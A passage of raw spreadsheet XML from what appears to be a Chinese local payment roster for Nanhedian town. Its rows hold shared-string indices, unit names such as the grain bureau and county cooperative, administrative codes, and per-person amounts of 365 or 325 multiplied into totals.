        <v>6282</v>
      </c>
      <c r="B2387" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2387" s="24" t="s">
        <v>6283</v>
      </c>
      <c r="D2387" s="24" t="s">
        <v>6284</v>
      </c>
      <c r="E2387" s="24" t="s">
        <v>6285</v>
      </c>
      <c r="F2387" s="24" t="s">
        <v>6286</v>
      </c>
      <c r="G2387" s="24">
        <v>1</v>
      </c>
      <c r="H2387" s="25">
        <v>365</v>
      </c>
      <c r="I2387" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2387" s="24" t="s">
        <v>4666</v>
      </c>
      <c r="K2387" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2388" s="8" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2388" s="23" t="s">
        <v>6287</v>
      </c>
      <c r="B2388" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2388" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2388" s="24" t="s">
        <v>6288</v>
      </c>
      <c r="E2388" s="24" t="s">
        <v>6289</v>
      </c>
      <c r="F2388" s="24" t="s">
        <v>6185</v>
      </c>
      <c r="G2388" s="24">
        <v>1</v>
      </c>
      <c r="H2388" s="25">
        <v>365</v>
      </c>
      <c r="I2388" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2388" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K2388" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2389" s="8" customFormat="1" customHeight="1" spans="1:11">
      <c r="A2389" s="23" t="s">
        <v>6290</v>
      </c>
      <c r="B2389" s="24" t="s">
        <v>6110</v>
      </c>
      <c r="C2389" s="24" t="s">
        <v>6291</v>
      </c>
      <c r="D2389" s="24" t="s">
        <v>1183</v>
      </c>
      <c r="E2389" s="24" t="s">
        <v>6210</v>
      </c>
      <c r="F2389" s="24" t="s">
        <v>6185</v>
      </c>
      <c r="G2389" s="24">
        <v>1</v>
      </c>
      <c r="H2389" s="25">
        <v>365</v>
      </c>
      <c r="I2389" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2389" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2389" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2390" customHeight="1" spans="1:11">
      <c r="A2390" s="23" t="s">
        <v>6292</v>
      </c>
      <c r="B2390" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2390" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2390" s="24" t="s">
        <v>6294</v>
      </c>
      <c r="E2390" s="24" t="s">
        <v>6295</v>
      </c>
      <c r="F2390" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2390" s="24">
        <v>1</v>
      </c>
      <c r="H2390" s="25">
        <v>365</v>
      </c>
      <c r="I2390" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2390" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2390" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2391" customHeight="1" spans="1:11">
      <c r="A2391" s="23" t="s">
        <v>6297</v>
      </c>
      <c r="B2391" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2391" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2391" s="24" t="s">
        <v>6298</v>
      </c>
      <c r="E2391" s="24" t="s">
        <v>6299</v>
      </c>
      <c r="F2391" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2391" s="24">
        <v>1</v>
      </c>
      <c r="H2391" s="25">
        <v>365</v>
      </c>
      <c r="I2391" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2391" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2391" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2392" customHeight="1" spans="1:11">
      <c r="A2392" s="23" t="s">
        <v>6301</v>
      </c>
      <c r="B2392" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2392" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2392" s="24" t="s">
        <v>6302</v>
      </c>
      <c r="E2392" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F2392" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2392" s="24">
        <v>1</v>
      </c>
      <c r="H2392" s="25">
        <v>365</v>
      </c>
      <c r="I2392" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2392" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2392" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2393" customHeight="1" spans="1:11">
      <c r="A2393" s="23" t="s">
        <v>6303</v>
      </c>
      <c r="B2393" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2393" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2393" s="24" t="s">
        <v>6304</v>
      </c>
      <c r="E2393" s="24" t="s">
        <v>6305</v>
      </c>
      <c r="F2393" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2393" s="24">
        <v>2</v>
      </c>
      <c r="H2393" s="25">
        <v>325</v>
      </c>
      <c r="I2393" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2393" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2393" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2394" customHeight="1" spans="1:11">
      <c r="A2394" s="23" t="s">
        <v>6306</v>
      </c>
      <c r="B2394" s="24" t="str">
        <f>B2393</f>
        <v>南河店镇</v>
      </c>
      <c r="C2394" s="24" t="str">
        <f>C2393</f>
        <v>南河店镇</v>
      </c>
      <c r="D2394" s="30" t="s">
        <v>6307</v>
      </c>
      <c r="E2394" s="31" t="s">
        <v>6308</v>
      </c>
      <c r="F2394" s="24" t="str">
        <f>F2393</f>
        <v>4113211004</v>
      </c>
      <c r="G2394" s="24"/>
      <c r="H2394" s="24"/>
      <c r="I2394" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2394" s="24"/>
      <c r="K2394" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2395" customHeight="1" spans="1:11">
      <c r="A2395" s="23" t="s">
        <v>6309</v>
      </c>
      <c r="B2395" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2395" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2395" s="24" t="s">
        <v>6310</v>
      </c>
      <c r="E2395" s="24" t="s">
        <v>6311</v>
      </c>
      <c r="F2395" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2395" s="24">
        <v>1</v>
      </c>
      <c r="H2395" s="25">
        <v>365</v>
      </c>
      <c r="I2395" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2395" s="24" t="s">
        <v>5913</v>
      </c>
      <c r="K2395" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2396" customHeight="1" spans="1:11">
      <c r="A2396" s="23" t="s">
        <v>6312</v>
      </c>
      <c r="B2396" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2396" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2396" s="24" t="s">
        <v>6313</v>
      </c>
      <c r="E2396" s="24" t="s">
        <v>2627</v>
      </c>
      <c r="F2396" s="24" t="s">
        <v>6314</v>
      </c>
      <c r="G2396" s="24">
        <v>1</v>
      </c>
      <c r="H2396" s="25">
        <v>365</v>
      </c>
      <c r="I2396" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2396" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2396" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2397" customHeight="1" spans="1:11">
      <c r="A2397" s="23" t="s">
        <v>6315</v>
      </c>
      <c r="B2397" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2397" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2397" s="24" t="s">
        <v>6316</v>
      </c>
      <c r="E2397" s="24" t="s">
        <v>6317</v>
      </c>
      <c r="F2397" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2397" s="24">
        <v>2</v>
      </c>
      <c r="H2397" s="25">
        <v>325</v>
      </c>
      <c r="I2397" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2397" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2397" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2398" customHeight="1" spans="1:11">
      <c r="A2398" s="23" t="s">
        <v>6318</v>
      </c>
      <c r="B2398" s="24" t="str">
        <f>B2397</f>
        <v>南河店镇</v>
      </c>
      <c r="C2398" s="24" t="str">
        <f>C2397</f>
        <v>南河店镇</v>
      </c>
      <c r="D2398" s="30" t="s">
        <v>6319</v>
      </c>
      <c r="E2398" s="31" t="s">
        <v>6320</v>
      </c>
      <c r="F2398" s="24" t="str">
        <f>F2397</f>
        <v>4113211004</v>
      </c>
      <c r="G2398" s="24"/>
      <c r="H2398" s="24"/>
      <c r="I2398" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2398" s="24"/>
      <c r="K2398" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2399" customHeight="1" spans="1:11">
      <c r="A2399" s="23" t="s">
        <v>6321</v>
      </c>
      <c r="B2399" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2399" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="D2399" s="24" t="s">
        <v>6322</v>
      </c>
      <c r="E2399" s="24" t="s">
        <v>6323</v>
      </c>
      <c r="F2399" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2399" s="24">
        <v>1</v>
      </c>
      <c r="H2399" s="25">
        <v>365</v>
      </c>
      <c r="I2399" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2399" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2399" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2400" customHeight="1" spans="1:11">
      <c r="A2400" s="23" t="s">
        <v>6324</v>
      </c>
      <c r="B2400" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2400" s="24" t="s">
        <v>6325</v>
      </c>
      <c r="D2400" s="24" t="s">
        <v>6326</v>
      </c>
      <c r="E2400" s="24" t="s">
        <v>6327</v>
      </c>
      <c r="F2400" s="24" t="s">
        <v>6328</v>
      </c>
      <c r="G2400" s="24">
        <v>2</v>
      </c>
      <c r="H2400" s="25">
        <v>325</v>
      </c>
      <c r="I2400" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2400" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2400" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2401" customHeight="1" spans="1:11">
      <c r="A2401" s="23" t="s">
        <v>6329</v>
      </c>
      <c r="B2401" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2401" s="24" t="s">
        <v>6325</v>
      </c>
      <c r="D2401" s="32" t="s">
        <v>6330</v>
      </c>
      <c r="E2401" s="32" t="s">
        <v>6331</v>
      </c>
      <c r="F2401" s="24" t="s">
        <v>6328</v>
      </c>
      <c r="G2401" s="24"/>
      <c r="H2401" s="24"/>
      <c r="I2401" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2401" s="24"/>
      <c r="K2401" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2402" customHeight="1" spans="1:11">
      <c r="A2402" s="23" t="s">
        <v>6332</v>
      </c>
      <c r="B2402" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2402" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2402" s="24" t="s">
        <v>6333</v>
      </c>
      <c r="E2402" s="24" t="s">
        <v>6334</v>
      </c>
      <c r="F2402" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2402" s="24">
        <v>1</v>
      </c>
      <c r="H2402" s="25">
        <v>365</v>
      </c>
      <c r="I2402" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2402" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2402" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2403" customHeight="1" spans="1:11">
      <c r="A2403" s="23" t="s">
        <v>6335</v>
      </c>
      <c r="B2403" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2403" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2403" s="24" t="s">
        <v>6336</v>
      </c>
      <c r="E2403" s="24" t="s">
        <v>6337</v>
      </c>
      <c r="F2403" s="24" t="s">
        <v>6338</v>
      </c>
      <c r="G2403" s="24">
        <v>1</v>
      </c>
      <c r="H2403" s="25">
        <v>365</v>
      </c>
      <c r="I2403" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2403" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2403" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2404" customHeight="1" spans="1:11">
      <c r="A2404" s="23" t="s">
        <v>6339</v>
      </c>
      <c r="B2404" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2404" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2404" s="24" t="s">
        <v>6340</v>
      </c>
      <c r="E2404" s="24" t="s">
        <v>2957</v>
      </c>
      <c r="F2404" s="24" t="s">
        <v>6314</v>
      </c>
      <c r="G2404" s="24">
        <v>1</v>
      </c>
      <c r="H2404" s="25">
        <v>365</v>
      </c>
      <c r="I2404" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2404" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2404" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2405" customHeight="1" spans="1:11">
      <c r="A2405" s="23" t="s">
        <v>6341</v>
      </c>
      <c r="B2405" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2405" s="24" t="s">
        <v>5332</v>
      </c>
      <c r="D2405" s="24" t="s">
        <v>6342</v>
      </c>
      <c r="E2405" s="24" t="s">
        <v>6343</v>
      </c>
      <c r="F2405" s="24" t="s">
        <v>6338</v>
      </c>
      <c r="G2405" s="24">
        <v>1</v>
      </c>
      <c r="H2405" s="25">
        <v>365</v>
      </c>
      <c r="I2405" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2405" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2405" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2406" customHeight="1" spans="1:11">
      <c r="A2406" s="23" t="s">
        <v>6344</v>
      </c>
      <c r="B2406" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2406" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2406" s="24" t="s">
        <v>6345</v>
      </c>
      <c r="E2406" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F2406" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2406" s="24">
        <v>1</v>
      </c>
      <c r="H2406" s="25">
        <v>365</v>
      </c>
      <c r="I2406" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2406" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2406" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2407" customHeight="1" spans="1:11">
      <c r="A2407" s="23" t="s">
        <v>6346</v>
      </c>
      <c r="B2407" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2407" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2407" s="24" t="s">
        <v>6347</v>
      </c>
      <c r="E2407" s="24" t="s">
        <v>6348</v>
      </c>
      <c r="F2407" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2407" s="24">
        <v>1</v>
      </c>
      <c r="H2407" s="25">
        <v>365</v>
      </c>
      <c r="I2407" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2407" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2407" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2408" customHeight="1" spans="1:11">
      <c r="A2408" s="23" t="s">
        <v>6349</v>
      </c>
      <c r="B2408" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2408" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2408" s="24" t="s">
        <v>6350</v>
      </c>
      <c r="E2408" s="24" t="s">
        <v>6351</v>
      </c>
      <c r="F2408" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2408" s="24">
        <v>1</v>
      </c>
      <c r="H2408" s="25">
        <v>365</v>
      </c>
      <c r="I2408" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2408" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2408" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2409" customHeight="1" spans="1:11">
      <c r="A2409" s="23" t="s">
        <v>6352</v>
      </c>
      <c r="B2409" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2409" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2409" s="24" t="s">
        <v>6353</v>
      </c>
      <c r="E2409" s="24" t="s">
        <v>6354</v>
      </c>
      <c r="F2409" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2409" s="24">
        <v>2</v>
      </c>
      <c r="H2409" s="25">
        <v>325</v>
      </c>
      <c r="I2409" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2409" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2409" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2410" customHeight="1" spans="1:11">
      <c r="A2410" s="23" t="s">
        <v>6355</v>
      </c>
      <c r="B2410" s="24" t="str">
        <f>B2409</f>
        <v>南河店镇</v>
      </c>
      <c r="C2410" s="24" t="str">
        <f>C2409</f>
        <v>粮食局</v>
      </c>
      <c r="D2410" s="30" t="s">
        <v>6356</v>
      </c>
      <c r="E2410" s="31" t="s">
        <v>6331</v>
      </c>
      <c r="F2410" s="24" t="str">
        <f>F2409</f>
        <v>4113211004</v>
      </c>
      <c r="G2410" s="24"/>
      <c r="H2410" s="24"/>
      <c r="I2410" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2410" s="24"/>
      <c r="K2410" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2411" customHeight="1" spans="1:11">
      <c r="A2411" s="23" t="s">
        <v>6357</v>
      </c>
      <c r="B2411" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2411" s="24" t="s">
        <v>6079</v>
      </c>
      <c r="D2411" s="24" t="s">
        <v>6358</v>
      </c>
      <c r="E2411" s="24" t="s">
        <v>6343</v>
      </c>
      <c r="F2411" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2411" s="24">
        <v>1</v>
      </c>
      <c r="H2411" s="25">
        <v>365</v>
      </c>
      <c r="I2411" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2411" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2411" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2412" customHeight="1" spans="1:11">
      <c r="A2412" s="23" t="s">
        <v>6359</v>
      </c>
      <c r="B2412" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2412" s="24" t="s">
        <v>6360</v>
      </c>
      <c r="D2412" s="24" t="s">
        <v>6361</v>
      </c>
      <c r="E2412" s="24" t="s">
        <v>6259</v>
      </c>
      <c r="F2412" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2412" s="24">
        <v>1</v>
      </c>
      <c r="H2412" s="25">
        <v>365</v>
      </c>
      <c r="I2412" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2412" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2412" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2413" customHeight="1" spans="1:11">
      <c r="A2413" s="23" t="s">
        <v>6362</v>
      </c>
      <c r="B2413" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2413" s="24" t="s">
        <v>6360</v>
      </c>
      <c r="D2413" s="24" t="s">
        <v>6363</v>
      </c>
      <c r="E2413" s="24" t="s">
        <v>6364</v>
      </c>
      <c r="F2413" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2413" s="24">
        <v>1</v>
      </c>
      <c r="H2413" s="25">
        <v>365</v>
      </c>
      <c r="I2413" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2413" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2413" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2414" customHeight="1" spans="1:11">
      <c r="A2414" s="23" t="s">
        <v>6365</v>
      </c>
      <c r="B2414" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2414" s="24" t="s">
        <v>6360</v>
      </c>
      <c r="D2414" s="24" t="s">
        <v>6366</v>
      </c>
      <c r="E2414" s="24" t="s">
        <v>6367</v>
      </c>
      <c r="F2414" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2414" s="24">
        <v>1</v>
      </c>
      <c r="H2414" s="25">
        <v>365</v>
      </c>
      <c r="I2414" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2414" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2414" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2415" customHeight="1" spans="1:11">
      <c r="A2415" s="23" t="s">
        <v>6368</v>
      </c>
      <c r="B2415" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2415" s="24" t="s">
        <v>5336</v>
      </c>
      <c r="D2415" s="24" t="s">
        <v>6369</v>
      </c>
      <c r="E2415" s="24" t="s">
        <v>1289</v>
      </c>
      <c r="F2415" s="24" t="s">
        <v>6296</v>
      </c>
      <c r="G2415" s="24">
        <v>2</v>
      </c>
      <c r="H2415" s="25">
        <v>325</v>
      </c>
      <c r="I2415" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2415" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2415" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2416" customHeight="1" spans="1:11">
      <c r="A2416" s="23" t="s">
        <v>6370</v>
      </c>
      <c r="B2416" s="24" t="str">
        <f>B2415</f>
        <v>南河店镇</v>
      </c>
      <c r="C2416" s="24" t="str">
        <f>C2415</f>
        <v>商业中心</v>
      </c>
      <c r="D2416" s="23" t="s">
        <v>6371</v>
      </c>
      <c r="E2416" s="23" t="s">
        <v>6372</v>
      </c>
      <c r="F2416" s="24" t="str">
        <f>F2415</f>
        <v>4113211003</v>
      </c>
      <c r="G2416" s="24"/>
      <c r="H2416" s="24"/>
      <c r="I2416" s="24">
        <f t="shared" si="37"/>
        <v>0</v>
      </c>
      <c r="J2416" s="24"/>
      <c r="K2416" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2417" customHeight="1" spans="1:11">
      <c r="A2417" s="23" t="s">
        <v>6373</v>
      </c>
      <c r="B2417" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2417" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2417" s="24" t="s">
        <v>6375</v>
      </c>
      <c r="E2417" s="24" t="s">
        <v>6376</v>
      </c>
      <c r="F2417" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2417" s="24">
        <v>1</v>
      </c>
      <c r="H2417" s="25">
        <v>365</v>
      </c>
      <c r="I2417" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2417" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2417" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2418" customHeight="1" spans="1:11">
      <c r="A2418" s="23" t="s">
        <v>6377</v>
      </c>
      <c r="B2418" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2418" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2418" s="24" t="s">
        <v>6378</v>
      </c>
      <c r="E2418" s="24" t="s">
        <v>6259</v>
      </c>
      <c r="F2418" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2418" s="24">
        <v>1</v>
      </c>
      <c r="H2418" s="25">
        <v>365</v>
      </c>
      <c r="I2418" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2418" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2418" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2419" customHeight="1" spans="1:11">
      <c r="A2419" s="23" t="s">
        <v>6379</v>
      </c>
      <c r="B2419" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2419" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2419" s="24" t="s">
        <v>6380</v>
      </c>
      <c r="E2419" s="24" t="s">
        <v>6381</v>
      </c>
      <c r="F2419" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2419" s="24">
        <v>1</v>
      </c>
      <c r="H2419" s="25">
        <v>365</v>
      </c>
      <c r="I2419" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2419" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2419" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2420" customHeight="1" spans="1:11">
      <c r="A2420" s="23" t="s">
        <v>6382</v>
      </c>
      <c r="B2420" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2420" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2420" s="24" t="s">
        <v>6383</v>
      </c>
      <c r="E2420" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F2420" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2420" s="24">
        <v>1</v>
      </c>
      <c r="H2420" s="25">
        <v>365</v>
      </c>
      <c r="I2420" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2420" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2420" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2421" customHeight="1" spans="1:11">
      <c r="A2421" s="23" t="s">
        <v>6384</v>
      </c>
      <c r="B2421" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2421" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2421" s="24" t="s">
        <v>6385</v>
      </c>
      <c r="E2421" s="24" t="s">
        <v>6337</v>
      </c>
      <c r="F2421" s="24" t="s">
        <v>6386</v>
      </c>
      <c r="G2421" s="24">
        <v>1</v>
      </c>
      <c r="H2421" s="25">
        <v>365</v>
      </c>
      <c r="I2421" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2421" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2421" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2422" customHeight="1" spans="1:11">
      <c r="A2422" s="23" t="s">
        <v>6387</v>
      </c>
      <c r="B2422" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2422" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2422" s="24" t="s">
        <v>6388</v>
      </c>
      <c r="E2422" s="24" t="s">
        <v>6389</v>
      </c>
      <c r="F2422" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2422" s="24">
        <v>1</v>
      </c>
      <c r="H2422" s="25">
        <v>365</v>
      </c>
      <c r="I2422" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2422" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2422" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2423" customHeight="1" spans="1:11">
      <c r="A2423" s="23" t="s">
        <v>6390</v>
      </c>
      <c r="B2423" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2423" s="24" t="s">
        <v>6374</v>
      </c>
      <c r="D2423" s="24" t="s">
        <v>6391</v>
      </c>
      <c r="E2423" s="24" t="s">
        <v>6392</v>
      </c>
      <c r="F2423" s="24" t="s">
        <v>6393</v>
      </c>
      <c r="G2423" s="24">
        <v>1</v>
      </c>
      <c r="H2423" s="25">
        <v>365</v>
      </c>
      <c r="I2423" s="24">
        <f t="shared" si="37"/>
        <v>365</v>
      </c>
      <c r="J2423" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2423" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2424" customHeight="1" spans="1:11">
      <c r="A2424" s="23" t="s">
        <v>6394</v>
      </c>
      <c r="B2424" s="24" t="s">
        <v>6293</v>
      </c>
      <c r="C2424" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2424" s="24" t="s">
        <v>6395</v>
      </c>
      <c r="E2424" s="24" t="s">
        <v>6396</v>
      </c>
      <c r="F2424" s="24" t="s">
        <v>6300</v>
      </c>
      <c r="G2424" s="24">
        <v>2</v>
      </c>
      <c r="H2424" s="25">
        <v>325</v>
      </c>
      <c r="I2424" s="24">
        <f t="shared" si="37"/>
        <v>650</v>
      </c>
      <c r="J2424" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2424" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2425" customHeight="1" spans="1:11">
      <c r="A2425" s="23" t="s">
        <v>6397</v>
      </c>
      <c r="B2425" s="24" t="str">
        <f>B2424</f>
        <v>南河店镇</v>
      </c>
      <c r="C2425" s="24" t="str">
        <f>C2424</f>
        <v>县社</v>
      </c>
      <c r="D2425" s="31" t="s">
        <v>6398</v>
      </c>
      <c r="E2425" s="31" t="s">
        <v>6399</v>
      </c>
      <c r="F2425" s="24" t="str">
        <f>F2424</f>
